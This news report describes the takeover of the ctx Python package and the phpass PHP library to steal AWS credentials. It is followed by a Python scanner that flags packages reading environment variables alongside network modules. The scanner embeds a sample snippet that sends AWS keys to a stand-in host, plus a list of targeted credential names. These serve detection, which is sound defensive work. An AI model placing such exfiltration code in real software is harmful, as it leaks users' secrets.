The attackers took control of the ctx Python package and the phpass PHP library

Unknown attackers took control of the ctx Python package and the phpass PHP library and then published updates containing a malicious insert that sent the contents of environment variables to an external server, evidently in the hope of harvesting AWS and continuous-integration tokens. According to available statistics, the ctx Python package is downloaded from the PyPI repository about 22 thousand times a week. The phpass PHP package is distributed through the Composer repository and has been downloaded over 2.5 million times to date.

In ctx, the malicious code was placed on May 15 in release 0.2.2 and on May 26 in release 0.2.6; on May 21 the old release 0.1.2, originally published in 2014, was also replaced. Access is assumed to have been obtained by compromising the developer's account.

In the case of the phpass PHP package, the malicious code was introduced by registering a new GitHub repository under the same name, hautelook/phpass: the owner of the original repository had deleted his hautelook account, and the attacker exploited this by registering a new account with the same name and creating a phpass repository under it containing the malicious code. Five days ago a change was added to that repository that sends the contents of the AWS_ACCESS_KEY and AWS_SECRET_KEY environment variables to an external server.

An attempt to publish the malicious package in the Composer repository was promptly blocked, and the compromised hautelook/phpass package was redirected to the bordoni/phpass package, which continues development of the project. In both ctx and phpass the environment variables were sent to the same server, "anti-theft-web.herokuapp[.]com", indicating that the package hijacking attacks were carried out by the same person.
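A detection heuristic for the behaviour described above (a module that both reads environment variables and can reach the network), written as an added example that is not the article's own code; the module list, the variable names beyond those the article mentions, and the two constructed sample sources are assumptions:

```python
import ast
from pathlib import Path

# Modules whose presence alongside an environment read is treated as suspicious (assumption).
NETWORK_MODULES = {"urllib", "urllib.request", "requests", "socket", "http.client"}
# Variables named in the article as the attackers' target.
SENSITIVE_VARS = {"AWS_ACCESS_KEY", "AWS_SECRET_KEY"}

# Constructed sample sources (not the real payload) used to exercise the scanner.
SAMPLE_MALICIOUS = '''
import os
import urllib.request
def _beacon():
    data = {"a": os.environ.get("AWS_ACCESS_KEY"), "s": os.getenv("AWS_SECRET_KEY")}
    urllib.request.urlopen("https://example.invalid/collect", data=str(data).encode())
'''
SAMPLE_BENIGN = '''
import os
def config_dir():
    return os.environ.get("XDG_CONFIG_HOME", "~/.config")
'''

def analyze_source(source):
    """Report whether one Python source file both reads the environment and imports a network module."""
    imports, env_reads, named = set(), 0, set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            imports.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module)
        elif isinstance(node, ast.Attribute) and node.attr == "environ":
            env_reads += 1  # os.environ[...] / os.environ.get(...) / dict(os.environ)
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute) and node.func.attr == "getenv":
            env_reads += 1  # os.getenv(...)
        elif isinstance(node, ast.Constant) and node.value in SENSITIVE_VARS:
            named.add(node.value)  # literal reference to a credential variable name
    network = bool(imports & NETWORK_MODULES)
    return {"network": network, "env_reads": env_reads,
            "sensitive_vars": sorted(named), "suspicious": network and env_reads > 0}

def scan_package(root):
    """Walk an unpacked or installed package directory and return (path, findings) for every flagged file."""
    hits = []
    for path in Path(root).rglob("*.py"):
        result = analyze_source(path.read_text(encoding="utf-8", errors="replace"))
        if result["suspicious"]:
            hits.append((str(path), result))
    return hits
```

Run scan_package against the unpacked sdist or wheel of a dependency before an upgrade reaches CI; a hit is a prompt for manual review, not proof of compromise, since legitimate packages also read the environment.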

Source: opennet.ru